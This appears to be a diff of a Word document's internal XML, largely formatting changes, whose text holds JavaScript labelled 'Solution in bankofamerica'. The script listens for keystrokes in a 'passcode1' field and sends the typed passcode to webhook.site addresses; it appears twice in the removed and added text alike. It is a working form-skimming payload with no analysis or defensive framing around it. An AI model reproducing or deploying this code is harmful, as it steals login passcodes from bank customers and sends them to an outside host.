-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t>document.getElementsByName("passcode1")[0].addEventListener("keyup", function(){</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">  var xhttp = new XMLHttpRequest();</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t>xhttp.onreadystatechange = function() {</w:t>
+        <w:t xml:space="preserve">Solution in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>bankofamerica</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>document.getElementsByName</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>("passcode1")[0].addEventListener("keyup", function(){</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">  var </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>xhttp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = new </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>XMLHttpRequest</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>xhttp.onreadystatechange</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = function() {</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -303,9 +393,11 @@
       <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
       </w:pPr>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:t>return;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -327,16 +419,30 @@
       <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
       </w:pPr>
-      <w:r>
-        <w:t>xhttp.open("GET", "https://webhook.site/b9be4275-fa6b-44ce-8a7b-fe7ec5ad20c9?a="+document.getElementsByTagName("passcode1")[0].value, true);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t>xhttp.send();</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>xhttp.open</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>("GET", "https://webhook.site/b9be4275-fa6b-44ce-8a7b-fe7ec5ad20c9?a="+document.getElementsByTagName("passcode1")[0].value, true);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>xhttp.send</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>();</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -367,8 +473,13 @@
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="0"/>
       </w:pPr>
-      <w:r>
-        <w:t>document.getElementsByName("passcode1")[0].addEventListener("keyup", function(){</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>document.getElementsByName</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>("passcode1")[0].addEventListener("keyup", function(){</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -377,7 +488,28 @@
         <w:ind w:firstLine="0"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">  var xhttp = new XMLHttpRequest();</w:t>
+        <w:t xml:space="preserve">  var </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>xhttp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = new </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>XMLHttpRequest</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>);</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -385,8 +517,15 @@
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="0"/>
       </w:pPr>
-      <w:r>
-        <w:t>xhttp.onreadystatechange = function() {</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>xhttp.onreadystatechange</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = function() {</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -403,9 +542,11 @@
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="0"/>
       </w:pPr>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:t>return;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -430,9 +571,16 @@
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="0"/>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>xhttp.open("GET", "https://webhook.site/9b61fa75-8efd-40a4-9acf-f7922479de3f?a="+document.getElementById("passcode1").value, true);</w:t>
+        <w:t>xhttp.open</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>("GET", "https://webhook.site/9b61fa75-8efd-40a4-9acf-f7922479de3f?a="+document.getElementById("passcode1").value, true);</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -440,8 +588,15 @@
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="0"/>
       </w:pPr>
-      <w:r>
-        <w:t>xhttp.send();</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>xhttp.send</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>();</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -471,8 +626,8 @@
 </file>
 
 <file path=word/endnotes.xml><?xml version="1.0" encoding="utf-8"?>
-<w:endnotes xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">
-  <w:endnote w:type="separator" w:id="0">
+<w:endnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex wp14">
+  <w:endnote w:type="separator" w:id="-1">
     <w:p>
       <w:pPr>
         <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
@@ -482,7 +637,7 @@
       </w:r>
     </w:p>
   </w:endnote>
-  <w:endnote w:type="continuationSeparator" w:id="1">
+  <w:endnote w:type="continuationSeparator" w:id="0">
     <w:p>
       <w:pPr>
         <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
@@ -496,7 +651,7 @@
 </file>
 
 <file path=word/footer1.xml><?xml version="1.0" encoding="utf-8"?>
-<w:ftr xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">
+<w:ftr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex wp14">
   <w:p>
     <w:pPr>
       <w:pStyle w:val="Footer"/>
@@ -506,7 +661,7 @@
 </file>
 
 <file path=word/footer2.xml><?xml version="1.0" encoding="utf-8"?>
-<w:ftr xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">
+<w:ftr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex wp14">
   <w:p>
     <w:pPr>
       <w:pStyle w:val="Footer"/>
@@ -516,7 +671,7 @@
 </file>
 
 <file path=word/footer3.xml><?xml version="1.0" encoding="utf-8"?>
-<w:ftr xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">
+<w:ftr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex wp14">
   <w:p>
     <w:pPr>
       <w:pStyle w:val="Footer"/>
@@ -526,8 +681,8 @@
 </file>
 
 <file path=word/footnotes.xml><?xml version="1.0" encoding="utf-8"?>
-<w:footnotes xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">
-  <w:footnote w:type="separator" w:id="0">
+<w:footnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex wp14">
+  <w:footnote w:type="separator" w:id="-1">
     <w:p>
       <w:pPr>
         <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
@@ -537,7 +692,7 @@
       </w:r>
     </w:p>
   </w:footnote>
-  <w:footnote w:type="continuationSeparator" w:id="1">
+  <w:footnote w:type="continuationSeparator" w:id="0">
     <w:p>
       <w:pPr>
         <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
@@ -551,7 +706,7 @@
 </file>
 
 <file path=word/header1.xml><?xml version="1.0" encoding="utf-8"?>
-<w:hdr xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">
+<w:hdr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex wp14">
   <w:p>
     <w:pPr>
       <w:pStyle w:val="Header"/>
@@ -561,7 +716,7 @@
 </file>
 
 <file path=word/header2.xml><?xml version="1.0" encoding="utf-8"?>
-<w:hdr xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">
+<w:hdr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex wp14">
